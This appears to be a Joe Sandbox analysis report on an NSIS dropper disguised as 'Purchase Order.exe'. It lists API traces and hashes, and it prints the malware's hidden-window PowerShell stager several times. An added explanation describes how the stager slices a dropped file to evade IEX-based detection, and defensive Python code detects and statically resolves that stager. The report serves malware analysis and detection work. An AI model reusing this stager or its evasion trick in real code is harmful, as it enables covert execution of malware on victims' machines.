  • Part of subcall function 00404F48: lstrlenA.KERNEL32(Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)",00000000,0041859B,759223A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
  • Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)",00000000,0041859B,759223A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
  • Part of subcall function 00404F48: lstrcatA.KERNEL32(Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)",00402FFA,00402FFA,Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)",00000000,0041859B,759223A0), ref: 00404FA4
  • Part of subcall function 00404F48: SetWindowTextA.USER32(Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)",Execute: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)"), ref: 00404FB6
  • Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
  • Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
  • Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
• LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FCB
• GetProcAddress.KERNEL32(00000000,?), ref: 00401FDB
• FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402045
Strings
• "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)", xrefs: 0040200F
Memory Dump Source
• Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
Similarity
• API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
• String ID: "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)"
• API String ID: 2987980305-3891765529
• Opcode ID: 05630326f1bd519bde5c4de3ea5bb4b46a5dd0ab86cb976c5128ba56ceecd2b7
• Instruction ID: 2138191ccfc75e686ed6e38fe7ddd30e16a5f0053d2c4fe6557c99b01bfc6870
• Opcode Fuzzy Hash: 05630326f1bd519bde5c4de3ea5bb4b46a5dd0ab86cb976c5128ba56ceecd2b7
• Instruction Fuzzy Hash: 58212B72904211EBDF217F658E4CAAE3671AB45318F30423BF701B62D0D7BC4946D66E
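The Execute: string logged by this installer function is the complete hand-off from the NSIS stub to PowerShell and is worth reading closely: the dropped file Epilogic.bac is read into $Encloser, three characters at offset 2901 of that text are copied into $Gulvhjderne229, and .$Gulvhjderne229($Encloser) then invokes whatever those three characters name, with the whole file as its argument. The command that actually runs never appears in the command line, only its position inside the file does, so a detection keyed on a literal cmdlet or alias name (Invoke-Expression, IEX) does not fire on this line. The Python below is an added triage example, not part of the Joe Sandbox report: it recognises this Get-Content / SubString / dot-invoke shape in a process command line and, given the dropped file's text, resolves the slice statically instead of letting PowerShell execute it. The report does not include Epilogic.bac, so SAMPLE_BAC is constructed for the test, and placing the alias IEX at offset 2901 is an assumption made for illustration; the code also assumes the file is a single line, so that Get-Content yields one string rather than an array of lines.

```python
import re

# Command line exactly as the report records it in the "Execute:" log string above.
REPORTED_CMDLINE = (
    '"powershell.exe" -windowstyle hidden "$Encloser=Get-Content '
    "'C:\\Users\\user\\AppData\\Local\\potentially\\Avantgarders\\Epilogic.bac';"
    '$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)"'
)

# Shape of the stager:  $A = Get-Content '<file>'; $B = $A.SubString(<off>,<len>); .$B($A)
# The command that executes ($B) is never written in the command line; only its
# position inside the dropped file is.  Backreferences tie the three parts together
# so an unrelated Get-Content or SubString elsewhere does not match.
STAGER_RE = re.compile(
    r"\$(?P<content>\w+)\s*=\s*Get-Content\s+'(?P<path>[^']+)'\s*;\s*"
    r"\$(?P<cmd>\w+)\s*=\s*\$(?P=content)\.SubString\((?P<off>\d+)\s*,\s*(?P<len>\d+)\)\s*;\s*"
    r"[.&]\s*\$(?P=cmd)\(\s*\$(?P=content)\s*\)",
    re.IGNORECASE,
)


def parse_stager(cmdline):
    """Return path, slice and variable names if cmdline has the
    Get-Content / SubString / dot-invoke shape, otherwise None."""
    m = STAGER_RE.search(cmdline)
    if m is None:
        return None
    return {
        "path": m.group("path"),
        "offset": int(m.group("off")),
        "length": int(m.group("len")),
        "content_var": m.group("content"),
        "cmd_var": m.group("cmd"),
        "hidden_window": bool(re.search(r"-windowstyle\s+hidden", cmdline, re.IGNORECASE)),
    }


def resolve_token(file_text, offset, length):
    """Apply the same slice PowerShell would, on the file's text, without running it.

    The offset counts characters, not bytes: decode the dropped file the way
    Get-Content would (BOM-detected, otherwise ANSI on Windows PowerShell 5),
    or the slice lands on the wrong characters.
    """
    if offset + length > len(file_text):
        raise ValueError("slice past end of file: wrong file or wrong text encoding")
    return file_text[offset:offset + length]


def triage(cmdline, file_text):
    """Parse the command line, then name the command it resolves to."""
    info = parse_stager(cmdline)
    if info is None:
        return None
    info["command"] = resolve_token(file_text, info["offset"], info["length"])
    return info


# Constructed stand-in for Epilogic.bac (the report does not include the file).
# ASSUMPTION for illustration only: the three characters at offset 2901 spell the
# alias "IEX".  The padding is a PowerShell comment so the token sits at exactly the
# offset the command line names; a real sample carries its decoder in the padding.
SAMPLE_BAC = "# " + "x" * 2899 + "IEX" + " ('script body would follow here')"


if __name__ == "__main__":
    print(triage(REPORTED_CMDLINE, SAMPLE_BAC))
```

Run triage against the real dropped file from the sandbox's file list, decoded with the same encoding Get-Content would use. If resolve_token raises, the offset does not line up, which in practice means the file was read with the wrong encoding or this is a different build of the dropper with a different offset; the parse_stager half still gives the hunt query (a hidden-window powershell.exe whose command line slices a Get-Content result and dot-invokes it).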
                                                          APIs
                                                          • SetWindowTextA.USER32(00000000,Misguidingly Setup), ref: 00403A0C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1987743110.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987770257.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1987821227.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1988017395.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: TextWindow
                                                          • String ID: "C:\Users\user\Desktop\Purchase Order.exe"$1033$Misguidingly Setup$Misguidingly Setup: Installing
                                                          • API String ID: 530164218-4004346090
                                                          • Opcode ID: c35f14d8ae607f964b1d366d12cd70842dee39e56cae11f13a59ba4c30930c7f
                                                          • Instruction ID: fbf6035dbb292e76ee93bcdc762ea67a79fb5cde0254510f453a1e05a67cff09
                                                          • Opcode Fuzzy Hash: c35f14d8ae607f964b1d366d12cd70842dee39e56cae11f13a59ba4c30930c7f
                                                          • Instruction Fuzzy Hash: 97110871B046109BC730AF56DC409737B6CEF89319368423FE801A73D1D639AD03CAA9
                                                          APIs
                                                          • GetDlgItem.USER32(?), ref: 00401CE2
                                                          • GetClientRect.USER32(00000000,?), ref: 00401CEF
                                                          • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D10
                                                          • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
                                                          • DeleteObject.GDI32(00000000), ref: 00401D2D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                          • String ID:
                                                          • API String ID: 1849352358-0
                                                          • Opcode ID: 7b3151235455efa7101d04b7e9aec4a9fd05a576d48d8a2a9df35770264f85f7
                                                          • Instruction ID: 718a49c372d49eeeb619100b459207f1cde729867d9d835a9e14b5832590348d
                                                          • Opcode Fuzzy Hash: 7b3151235455efa7101d04b7e9aec4a9fd05a576d48d8a2a9df35770264f85f7
                                                          • Instruction Fuzzy Hash: 74F0E7B2A04114AFEB01EBE4DE88DAFB7BDEB54305B10447AF602F6191C7749D018B79
                                                          APIs
                                                          • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 004057A7
                                                          • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 004057B0
                                                          • lstrcatA.KERNEL32(?,00409014), ref: 004057C1
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004057A1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: CharPrevlstrcatlstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 2659869361-823278215
                                                          • Opcode ID: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                          • Instruction ID: 31daa9478c60f2ec517fa6cf0afa0cd81b34b06dfe81de980877f4a94ee531a8
                                                          • Opcode Fuzzy Hash: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                          • Instruction Fuzzy Hash: 8ED0A762505D306BE21226155C09D8B2A08CF12740B044027F100B61E1C63C4D414FFD
                                                          APIs
                                                          • DestroyWindow.USER32(00000000,00000000,00402DE2,00000001), ref: 00402C15
                                                          • GetTickCount.KERNEL32 ref: 00402C33
                                                          • CreateDialogParamA.USER32(0000006F,00000000,00402B7F,00000000), ref: 00402C50
                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402C5E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                          • String ID:
                                                          • API String ID: 2102729457-0
                                                          • Opcode ID: 42481ae060c013658952b0ba65f2133d3ed78682e8b262a627202bc2b689c50f
                                                          • Instruction ID: 1b84634240e2166e3851fbc92cd381e461e1db94d3428fd6ef6110bf0b183a31
                                                          • Opcode Fuzzy Hash: 42481ae060c013658952b0ba65f2133d3ed78682e8b262a627202bc2b689c50f
                                                          • Instruction Fuzzy Hash: 97F05E30A09220EFD6317B20FE4CD9F7BA4BB04B15B404976F104B11EAC7782882CB9D
                                                          APIs
                                                            • Part of subcall function 00405D2F: lstrcpynA.KERNEL32(?,?,00000400,004031BD,Misguidingly Setup,NSIS Error), ref: 00405D3C
                                                            • Part of subcall function 0040583A: CharNextA.USER32(?,?,0042AC70,?,004058A6,0042AC70,0042AC70,75923410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405848
                                                            • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 0040584D
                                                            • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 00405861
                                                          • lstrlenA.KERNEL32(0042AC70,00000000,0042AC70,0042AC70,75923410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058E2
                                                          • GetFileAttributesA.KERNEL32(0042AC70,0042AC70,0042AC70,0042AC70,0042AC70,0042AC70,00000000,0042AC70,0042AC70,75923410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,75923410,C:\Users\user\AppData\Local\Temp\), ref: 004058F2
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040588F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 3248276644-823278215
                                                          • Opcode ID: db8bdf16e861f9482455b6e3180b19c0ec0d0437e7b2793ecf43ff70ccde9147
                                                          • Instruction ID: 9b9a112432e638448ae222c580828ae1e9a3246b43ea9c19d715dfb55d3aa95b
                                                          • Opcode Fuzzy Hash: db8bdf16e861f9482455b6e3180b19c0ec0d0437e7b2793ecf43ff70ccde9147
                                                          • Instruction Fuzzy Hash: 1CF0F427105D6156E622323A5C49A9F1A54CE86324718C53BFC50B22C2CA3C88639D7E
                                                          APIs
                                                          • IsWindowVisible.USER32(?), ref: 00404EEB
                                                          • CallWindowProcA.USER32(?,?,?,?), ref: 00404F3C
                                                            • Part of subcall function 00403F60: SendMessageA.USER32(00010446,00000000,00000000,00000000), ref: 00403F72
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: Window$CallMessageProcSendVisible
                                                          • String ID:
                                                          • API String ID: 3748168415-3916222277
                                                          • Opcode ID: 44c7124f25b7d0e2ad082f453cfb3c7493e33a8b49738481f167c29b071f4aa1
                                                          • Instruction ID: 2a78fc1f4cbdadc5126368fc20cebde0bfb6f5e986cb98bc8d814c8ad8ef1b08
                                                          • Opcode Fuzzy Hash: 44c7124f25b7d0e2ad082f453cfb3c7493e33a8b49738481f167c29b071f4aa1
                                                          • Instruction Fuzzy Hash: 6D01F7B150420AAFEF20AF51DE80A5B3766E7C4751F284037FB00762D0C3799C51966D
                                                          APIs
                                                          • FreeLibrary.KERNEL32(?,75923410,00000000,C:\Users\user\AppData\Local\Temp\,004035F2,0040340C,?), ref: 00403634
                                                          • GlobalFree.KERNEL32(00000000), ref: 0040363B
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040361A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: Free$GlobalLibrary
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 1100898210-823278215
                                                          • Opcode ID: dccbf9c36de3459267eb1af99735bed06c7a158201479be104942c1c24015bd8
                                                          • Instruction ID: 1a9bfca33d817e772708c534a1c0ef1eeb9da564593c1c7aee7843147688a1a4
                                                          • Opcode Fuzzy Hash: dccbf9c36de3459267eb1af99735bed06c7a158201479be104942c1c24015bd8
                                                          • Instruction Fuzzy Hash: 60E08C329050606BC6316F15ED04B2E76A9AB48B22F42006AEA407B3A08B756C424BCC
                                                          APIs
                                                          • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Purchase Order.exe,C:\Users\user\Desktop\Purchase Order.exe,80000000,00000003), ref: 004057EE
                                                          • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Purchase Order.exe,C:\Users\user\Desktop\Purchase Order.exe,80000000,00000003), ref: 004057FC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: CharPrevlstrlen
                                                          • String ID: C:\Users\user\Desktop
                                                          • API String ID: 2709904686-1246513382
                                                          • Opcode ID: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                                          • Instruction ID: 563d0c8124584ba78a4db43b9ec919a88ee2b9567cf051c7da1bb821b6b33a35
                                                          • Opcode Fuzzy Hash: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                                          • Instruction Fuzzy Hash: 48D0A773808D705FF34362109C04B8F6B48CF12740F094062E140A71D0C2780C414BBD
                                                          APIs
                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405917
                                                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 0040592F
                                                          • CharNextA.USER32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405940
                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405949
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1987756231.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                          • String ID:
                                                          • API String ID: 190613189-0
                                                          • Opcode ID: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                                          • Instruction ID: 9438e9cad6691fea7f13f8d56426e11099e03f26c07faecbb185dc05f13043cf
                                                          • Opcode Fuzzy Hash: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                                          • Instruction Fuzzy Hash: D5F06236505518FFCB129FA5DC00D9EBBA8EF16360B2540B9F800F7350D674EE01ABA9
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2746467074.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4460000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d24959183bd35ba3ad28bf5de1505637f3cb5328d921db052229a9ce8756ca86
                                                          • Instruction ID: 5ab4fd118a67a0313cdbf6ad6bc1e007c6fd35133ab1ab89e72d3bdfba64c3b6
                                                          • Opcode Fuzzy Hash: d24959183bd35ba3ad28bf5de1505637f3cb5328d921db052229a9ce8756ca86
                                                          • Instruction Fuzzy Hash: 18B14E70E00209CFDF14CFA9E98579EBBF2AB48354F14852AD456A7354EB74A849CF82
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2746467074.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4460000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cffe10869c9fb43b3e11384e7eff10790fccfc71e361574387493b021c72d4cd
                                                          • Instruction ID: b58a2e02a2b82b557f43b3c228066fbf1e1ca4e1658623fcbebaffb9e94ef7f6
                                                          • Opcode Fuzzy Hash: cffe10869c9fb43b3e11384e7eff10790fccfc71e361574387493b021c72d4cd
                                                          • Instruction Fuzzy Hash: B5B17270E002099FDF10CFA9D98579EBBF2BF48714F14852AD456E7354EB74A849CB82
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (fzl$(fzl$4'sq$4'sq$4'sq$4'sq$4'sq$4'sq$DUjk$tPsq$tPsq$$sq$$sq$$sq$$sq$$sq$$sq$$sq$$sq$$sq
                                                          • API String ID: 0-598723919
                                                          • Opcode ID: 08462577df4a1e36595a28888b223cba893f1dcd0883841ee3978992fde7d3d6
                                                          • Instruction ID: 7ca3e831c0e0294b30ebeb8617d0e97421a3e28aa9ea2e022965cd5c990a5d60
                                                          • Opcode Fuzzy Hash: 08462577df4a1e36595a28888b223cba893f1dcd0883841ee3978992fde7d3d6
                                                          • Instruction Fuzzy Hash: 5152D3F1B44205DFCB14EBA8C9916EBBBE2AF85310F14846BD9059B751DB32DC42CBA1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'sq$4'sq$4'sq$4'sq$4'sq$4'sq$4'sq$4'sq$tPsq$tPsq$$sq$$sq$$sq$$sq
                                                          • API String ID: 0-2908486730
                                                          • Opcode ID: 1d622508cd28d3a0ec3b4f030cc2e1651606fdc653380686f0aaf6be84b30005
                                                          • Instruction ID: 778cfaa7132fb8420df4c0724dcdc3d463766eaf1b826bbf51894a99d4783291
                                                          • Opcode Fuzzy Hash: 1d622508cd28d3a0ec3b4f030cc2e1651606fdc653380686f0aaf6be84b30005
                                                          • Instruction Fuzzy Hash: 964218B1B042069FCB25AB78C9516EBBBA2AFC5310F1584ABD505CB351DF32D942C792
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (fzl$(fzl$(fzl$(fzl$4'sq$4'sq$4'sq$4'sq$tPsq$tPsq$x.kk$-kk
                                                          • API String ID: 0-4102582495
                                                          • Opcode ID: 0c289c39e525052d8523e2aae448b767071925ed1d0af9f5faaef7d31f9aa97e
                                                          • Instruction ID: dde541643c11ceb9ada27add90650784fdc9278bcadf15c471662c416ccb0b23
                                                          • Opcode Fuzzy Hash: 0c289c39e525052d8523e2aae448b767071925ed1d0af9f5faaef7d31f9aa97e
                                                          • Instruction Fuzzy Hash: B0E295B0B00245DFDB14DFA8C541BAABBB2AF85314F15C5AAE9059F791CB32DC42CB91
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (fzl$(fzl$4'sq$4'sq$4'sq$4'sq$4wl$4wl$x.kk$x.kk$-kk
                                                          • API String ID: 0-773678778
                                                          • Opcode ID: 106c0533d475dce2c3305c23467de7003c5910d9ef84a1518c48ef2f59354b1f
                                                          • Instruction ID: 5821932331f3b9f8183508608a4de567cd9d4775fee47c5d75c87554d2f860fa
                                                          • Opcode Fuzzy Hash: 106c0533d475dce2c3305c23467de7003c5910d9ef84a1518c48ef2f59354b1f
                                                          • Instruction Fuzzy Hash: EA9251B0A00214DFD754DB58C951BAABBB2BF85304F1081E5E909AF795CB72ED82CF91
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'sq$4'sq$tPsq$tPsq$$sq$$sq$$sq$pl$pl$pl$pl
                                                          • API String ID: 0-2770468276
                                                          • Opcode ID: b2bc2b1181ee7b040d3aaaaea23fc1fb95e9e4d83e201be93a5063f38623c7a0
                                                          • Instruction ID: c2870ff72fa47c8bc16031c103dc7556aaf103a080da20c74c5c7edb356d2cb1
                                                          • Opcode Fuzzy Hash: b2bc2b1181ee7b040d3aaaaea23fc1fb95e9e4d83e201be93a5063f38623c7a0
                                                          • Instruction Fuzzy Hash: 65F13AF6B042268FCB14ABB894016EBBBE2AFC5311F1480BBD945CB751DB32D946C791
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'sq$4'sq$$sq$$sq$$sq$$sq$$sq$$sq
                                                          • API String ID: 0-830428688
                                                          • Opcode ID: b2f3f4901ef9eb5906f51d65a201a8111a41e99e95b0df9bc5cb8aa8bf2e0ed4
                                                          • Instruction ID: ca5b3d4c89aa5c0fc85dfaa5f5c84f87014886db177b4d5985d99309fc3d1381
                                                          • Opcode Fuzzy Hash: b2f3f4901ef9eb5906f51d65a201a8111a41e99e95b0df9bc5cb8aa8bf2e0ed4
                                                          • Instruction Fuzzy Hash: 78123DB17082468FCB15AB6984516ABBBE2AFC5214F24C46BD545DB362DF31C8C2C7A1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2750358475.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7410000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (fzl$(fzl$4'sq$4'sq$4'sq$4'sq$x.kk$-kk
                                                          • API String ID: 0-3999790251
                                                          • Opcode ID: 80503ff6dcb75b5ff365ab3b5258c63eac9fea4d3bdc0550ee591fde35daea51
                                                          • Instruction ID: a7f2da7ba2696544929b6ed48af3d1139255a6d92b972eb083d7eadf61d23b38
                                                          • Opcode Fuzzy Hash: 80503ff6dcb75b5ff365ab3b5258c63eac9fea4d3bdc0550ee591fde35daea51
